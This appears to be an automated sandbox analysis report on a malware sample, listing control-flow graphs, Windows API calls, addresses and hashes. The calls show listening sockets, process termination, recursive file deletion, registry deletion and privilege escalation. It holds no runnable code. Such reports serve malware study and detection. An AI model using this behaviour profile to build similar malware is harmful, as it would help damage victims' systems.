                                                                                                                                                                                                                                                      control_flow_graph 1494 4121eb-41229d call 421df0 call 421c60 htons call 41216e socket 1501 4122ad-4122bd bind 1494->1501 1502 41229f-4122a8 closesocket 1494->1502 1504 4122c7-4122d6 listen 1501->1504 1505 4122bf 1501->1505 1503 4126a1-4126a5 1502->1503 1507 4122d8-4122da 1504->1507 1508 4122dc-4122ef ioctlsocket 1504->1508 1506 4122c1-4122c2 1505->1506 1511 412698-41269f closesocket 1506->1511 1507->1506 1509 4122f1-4122f3 1508->1509 1510 4122f5-412322 1508->1510 1509->1506 1512 412696 1510->1512 1513 412328-412353 select 1510->1513 1511->1503 1512->1511 1514 4126a6-4126ac 1513->1514 1515 412359-412363 call 4117b1 call 4119f4 1513->1515 1514->1511 1520 412366-412378 __WSAFDIsSet 1515->1520 1521 412677-412680 1520->1521 1522 41237e-412384 1520->1522 1521->1520 1523 412686-41268d 1521->1523 1524 412455-41248e call 421c60 * 2 recv 1522->1524 1525 41238a-4123a4 accept 1522->1525 1523->1513 1526 412693 1523->1526 1537 412490-412499 1524->1537 1538 4124f4-41250b call 421cc0 1524->1538 1525->1521 1527 4123aa-4123cf getpeername call 411838 1525->1527 1526->1512 1534 4123d1-4123d8 1527->1534 1535 41243e-412450 shutdown closesocket 1527->1535 1534->1535 1536 4123da-4123e4 call 411762 1534->1536 1535->1521 1536->1535 1550 4123e6-412405 call 411775 GetTickCount 1536->1550 1540 41249b-4124a2 1537->1540 1541 4124cc-4124e5 shutdown closesocket call 41171d 1537->1541 1548 4125e1-4125f8 call 413761 1538->1548 1549 412511-41251c call 41171d 1538->1549 1545 4124a4-4124a7 1540->1545 1546 4124bf-4124c4 1540->1546 1541->1521 1558 4124eb-4124ef 1541->1558 1545->1540 1551 4124a9 1545->1551 1552 4124c6-4124c7 1546->1552 1553 4124ab-4124be 1546->1553 1566 412670 1548->1566 1567 4125fa-41260a lstrlenA 1548->1567 1562 412526-412534 call 411871 1549->1562 1563 41251e-412521 1549->1563 1564 412415-412417 1550->1564 1565 412407-41240e 1550->1565 1551->1541 1552->1541 1553->1546 1558->1521 1562->1563 1581 412536-41253a 1562->1581 1569 412671-412676 call 4121cc 1563->1569 1572 412419-41241c 1564->1572 1573 41242b-412430 1564->1573 1565->1564 1571 412410-412413 1565->1571 1566->1569 1567->1566 1568 41260c-412615 call 41171d 1567->1568 1568->1566 1582 412617-412629 call 411df7 1568->1582 1569->1521 1571->1564 1571->1565 1572->1573 1577 41241e-412425 1572->1577 1573->1521 1578 412436-412439 1573->1578 1577->1573 1578->1521 1583 41254d-412561 call 411905 1581->1583 1584 41253c-41254b call 411838 1581->1584 1582->1566 1591 41262b-41262d 1582->1591 1592 412563-412567 1583->1592 1593 41257c-412582 call 4119a6 1583->1593 1584->1563 1584->1583 1591->1521 1597 41262f-412638 1591->1597 1594 412583-412594 1592->1594 1595 412569-41257a send 1592->1595 1593->1594 1599 412596-4125a0 1594->1599 1600 4125cc-4125dc CreateThread 1594->1600 1595->1563 1597->1521 1601 41263a-412644 1597->1601 1602 4125a2-4125a5 1599->1602 1603 4125be-4125c3 1599->1603 1600->1521 1604 412661-412666 1601->1604 1605 412646-412649 1601->1605 1602->1599 1606 4125a7 1602->1606 1607 4125c5-4125c6 1603->1607 1608 4125a9-4125bd 1603->1608 1610 412668-41266e 1604->1610 1611 41264d-412660 1604->1611 1605->1601 1609 41264b 1605->1609 1606->1600 1607->1600 1608->1603 1609->1521 1610->1521 1611->1604
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • htons.WS2_32(00003EE0), ref: 00412263
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0041228F
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 004122A0
                                                                                                                                                                                                                                                      • bind.WS2_32(00000000,?,00000010), ref: 004122B4
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00412699
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: closesocket$bindhtonssocket
                                                                                                                                                                                                                                                      • String ID: GET
                                                                                                                                                                                                                                                      • API String ID: 1339886155-3027191851
                                                                                                                                                                                                                                                      • Opcode ID: 7ccfd6f5997ca50ce5dc6db67e99f9f710f04afa0fa3745a461eff4530263eaa
                                                                                                                                                                                                                                                      • Instruction ID: d311fc27eb13a375107f39839a4af2a922eccf7441768b3d5e47e018ee900ff6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ccfd6f5997ca50ce5dc6db67e99f9f710f04afa0fa3745a461eff4530263eaa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99D11471910214EFCF149F64ED88AEE77B8FB09355F10012BE516E2291DBB89DA1CB2D

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1612 41c19e-41c1b4 1613 41c1b6-41c1bd Sleep 1612->1613 1614 41c222-41c228 1613->1614 1615 41c22a-41c230 1614->1615 1616 41c1bf-41c1c9 1614->1616 1617 41c232-41c239 1615->1617 1618 41c299-41c2a0 Sleep 1615->1618 1616->1615 1619 41c1cb-41c1d5 GetTickCount 1616->1619 1617->1618 1620 41c23b-41c241 1617->1620 1618->1615 1621 41c1ea-41c1ee GetTickCount 1619->1621 1622 41c250-41c256 1620->1622 1623 41c243-41c24e 1620->1623 1624 41c1f0-41c1f6 1621->1624 1625 41c1d7-41c1e8 call 414787 Sleep 1621->1625 1627 41c260-41c266 1622->1627 1628 41c258-41c25e 1622->1628 1623->1618 1623->1622 1629 41c1f8 call 41c118 1624->1629 1630 41c1fd-41c203 1624->1630 1625->1621 1632 41c2a9-41c2bb call 412c9d 1627->1632 1633 41c268-41c26e 1627->1633 1628->1618 1628->1627 1629->1630 1635 41c205 1630->1635 1636 41c20b-41c215 1630->1636 1645 41c2a2-41c2a7 Sleep 1632->1645 1646 41c2bd-41c2c7 GetTickCount 1632->1646 1640 41c270-41c287 GetTickCount 1633->1640 1641 41c289-41c28f 1633->1641 1635->1636 1637 41c217 1636->1637 1638 41c21d call 410a09 1636->1638 1637->1638 1638->1614 1640->1618 1640->1641 1641->1632 1644 41c291-41c297 1641->1644 1644->1618 1644->1632 1645->1632 1647 41c2e1-41c2e5 GetTickCount 1646->1647 1648 41c2e7-41c2ed 1647->1648 1649 41c2c9-41c2d0 call 41bda5 1647->1649 1648->1613 1651 41c2f3 1648->1651 1649->1651 1654 41c2d2-41c2d8 1649->1654 1653 41c2f5-41c2fc call 41bda5 1651->1653 1659 41c335-41c35b call 414776 call 41411e 1653->1659 1660 41c2fe-41c30c Sleep call 41bda5 1653->1660 1657 41c2da-41c2df Sleep 1654->1657 1658 41c32e-41c333 1654->1658 1657->1647 1661 41c327-41c329 Sleep 1658->1661 1672 41c362-41c3f0 call 410a09 InitializeCriticalSection * 3 Sleep call 41bec1 call 41bdf3 call 41be8a 1659->1672 1673 41c35d 1659->1673 1666 41c313-41c320 Sleep 1660->1666 1667 41c30e call 41bf95 1660->1667 1661->1613 1666->1653 1670 41c322 1666->1670 1667->1666 1670->1661 1682 41c3f2-41c3fc 1672->1682 1683 41c3fe-41c416 call 41be8a 1672->1683 1673->1672 1684 41c468-41c479 call 41c10a 1682->1684 1689 41c424-41c43c call 41be8a 1683->1689 1690 41c418-41c422 1683->1690 1691 41c4a2-41c4a5 1684->1691 1692 41c47b-41c47c 1684->1692 1699 41c44a-41c463 call 41be8a 1689->1699 1700 41c43e-41c448 1689->1700 1690->1684 1697 41c4aa-41c4ac CreateThread 1691->1697 1695 41c498-41c4a0 1692->1695 1696 41c47e-41c47f 1692->1696 1695->1697 1701 41c481-41c482 1696->1701 1702 41c48e-41c496 1696->1702 1698 41c4ae-41c4b8 CreateThread 1697->1698 1703 41c4ba-41c4c6 call 41f298 Sleep 1698->1703 1699->1684 1700->1684 1701->1698 1705 41c484-41c48c 1701->1705 1702->1697 1705->1697
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041C1BB
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041C1CB
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(skype.exe), ref: 0041C1E8
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041C1EA
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041C270
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 0041C29E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041C2A7
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041C2BD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E7), ref: 0041C2DF
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041C2E1
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 0041C303
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 0041C318
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 0041C327
                                                                                                                                                                                                                                                        • Part of subcall function 00414776: EnumWindows.USER32(0041470D,00000000), ref: 00414780
                                                                                                                                                                                                                                                        • Part of subcall function 0041411E: GetTickCount.KERNEL32 ref: 0041411E
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0045A330), ref: 0041C372
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00463AB4), ref: 0041C379
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0045B020), ref: 0041C380
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041C387
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0041C62E,00000000,00000000,00000000), ref: 0041C4AC
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,004218D6,00000000,00000000,00000000), ref: 0041C4B8
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0041C4C4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$CountTick$CriticalInitializeSection$CreateThread$EnumWindows
                                                                                                                                                                                                                                                      • String ID: skype.exe
                                                                                                                                                                                                                                                      • API String ID: 147955496-1432977592
                                                                                                                                                                                                                                                      • Opcode ID: b18f0ede664f73b0f0952701a09adeefa0eeb19875e95bee723ef58539dce3fe
                                                                                                                                                                                                                                                      • Instruction ID: da50cea28471ff58dfe6edcfae1584a9064ff1a257102cfc2779c5ee05b94594
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b18f0ede664f73b0f0952701a09adeefa0eeb19875e95bee723ef58539dce3fe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D77129B09C8358BEE620A7619CC2BFB375CE70675AF04056BB90956183D77C8CC58A6F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000005,?,?,00000000), ref: 004092E3
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00409304
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00409318
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040932F
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00409379
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000026), ref: 004093C7
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 004093D5
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004093E5
                                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00409414
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00409427
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0040943E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Findwsprintf$Filelstrcatlstrcpylstrlen$CloseFirstNextSleep
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\%s*$%s\*$.$.exe
                                                                                                                                                                                                                                                      • API String ID: 726025564-1488415943
                                                                                                                                                                                                                                                      • Opcode ID: a7d0326dc2477d88f4b0589bebf32cb8436afe741def76fa24b80a86e5e35189
                                                                                                                                                                                                                                                      • Instruction ID: 8a5b5f6320cb998d4a51ea96e090637559c7b13efd41aa9022c31fab5c575317
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7d0326dc2477d88f4b0589bebf32cb8436afe741def76fa24b80a86e5e35189
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F41837690421DABCF219FA0DD88EDA7B6CEF14314F4400A2FD08E2191D779DEA68F95
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000005,76AE83C0,76AE8A60,00000000), ref: 00414891
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004148AF
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 004148C2
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00414905
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00414946
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,00000000), ref: 0041495F
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00414973
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 00414985
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00414995
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 004149A3
                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 004149B0
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 004149BE
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004149CF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Find$lstrcatwsprintf$AttributesCloseDeleteFirstNextSleeplstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$.
                                                                                                                                                                                                                                                      • API String ID: 2620824442-2663966076
                                                                                                                                                                                                                                                      • Opcode ID: fd92c6bfed2bd7e8c494e1457349e005d97c8806da0db38c392aa86de6e5bc65
                                                                                                                                                                                                                                                      • Instruction ID: 9e4a764dee98d0fe3cbafeb52e22fe68a34b156404d9c119ea68426d0a8c7798
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd92c6bfed2bd7e8c494e1457349e005d97c8806da0db38c392aa86de6e5bc65
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A311FB1A0021EABCF21DFA0DD8CFDB777CAB54315F4005A2BA09D2150D6789AA5CF95
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: EnterCriticalSection.KERNEL32(0044F7E0), ref: 00405B51
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: GetDesktopWindow.USER32 ref: 00405B68
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: GetWindowRect.USER32(00000000), ref: 00405B6F
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BCA
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BEB
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000), ref: 00405C17
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegDeleteValueA.KERNEL32(?,00000000), ref: 00405C37
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegCloseKey.ADVAPI32(?), ref: 00405C40
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: lstrlenA.KERNEL32(?), ref: 00405C70
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: GetCurrentProcess.KERNEL32(00000028,0040D4C0,76AF0F00,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D5A
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: OpenProcessToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D61
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: GetCurrentThread.KERNEL32 ref: 00413D74
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: OpenThreadToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D7B
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040604A,00000000,00000000,00000000), ref: 0040686A
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00406882
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 00406899
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004068AB
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 004068BE
                                                                                                                                                                                                                                                      • K32EnumProcesses.KERNEL32(?,00001000,?), ref: 004068D4
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,unknown), ref: 004068FF
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000411,00000000,?), ref: 0040690E
                                                                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00406925
                                                                                                                                                                                                                                                      • K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104), ref: 0040693F
                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00406969
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00406977
                                                                                                                                                                                                                                                      • EnumWindows.USER32(00405FD0,?), ref: 0040698A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$DeleteEnumOpenThread$CloseCountCreateCurrentSleepTickTokenWindow$BaseCriticalDesktopEnterHandleModuleModulesNameProcessesRectSectionTerminateValueWindowslstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: SeDebugPrivilege$unknown
                                                                                                                                                                                                                                                      • API String ID: 3286018168-986860467
                                                                                                                                                                                                                                                      • Opcode ID: 80a5958d18f964215dc2cf66851f0e2fd2d1e50365b2883e728d62c644ab6e73
                                                                                                                                                                                                                                                      • Instruction ID: 9c0e891f918fde1bb4dc23caddae53347e05642ca6a43f5c02609fdc1fd254ea
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80a5958d18f964215dc2cf66851f0e2fd2d1e50365b2883e728d62c644ab6e73
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A84154B1A01304ABEB20ABA19D49FEF777CEB04715F514077FA02F11D1DB78A950CA6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00404909,76AEE800,00000000), ref: 00406726
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406741
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00406754
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406798
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,0000000F), ref: 004067BB
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 004067CD
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004067DD
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 004067F8
                                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00406820
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406830
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
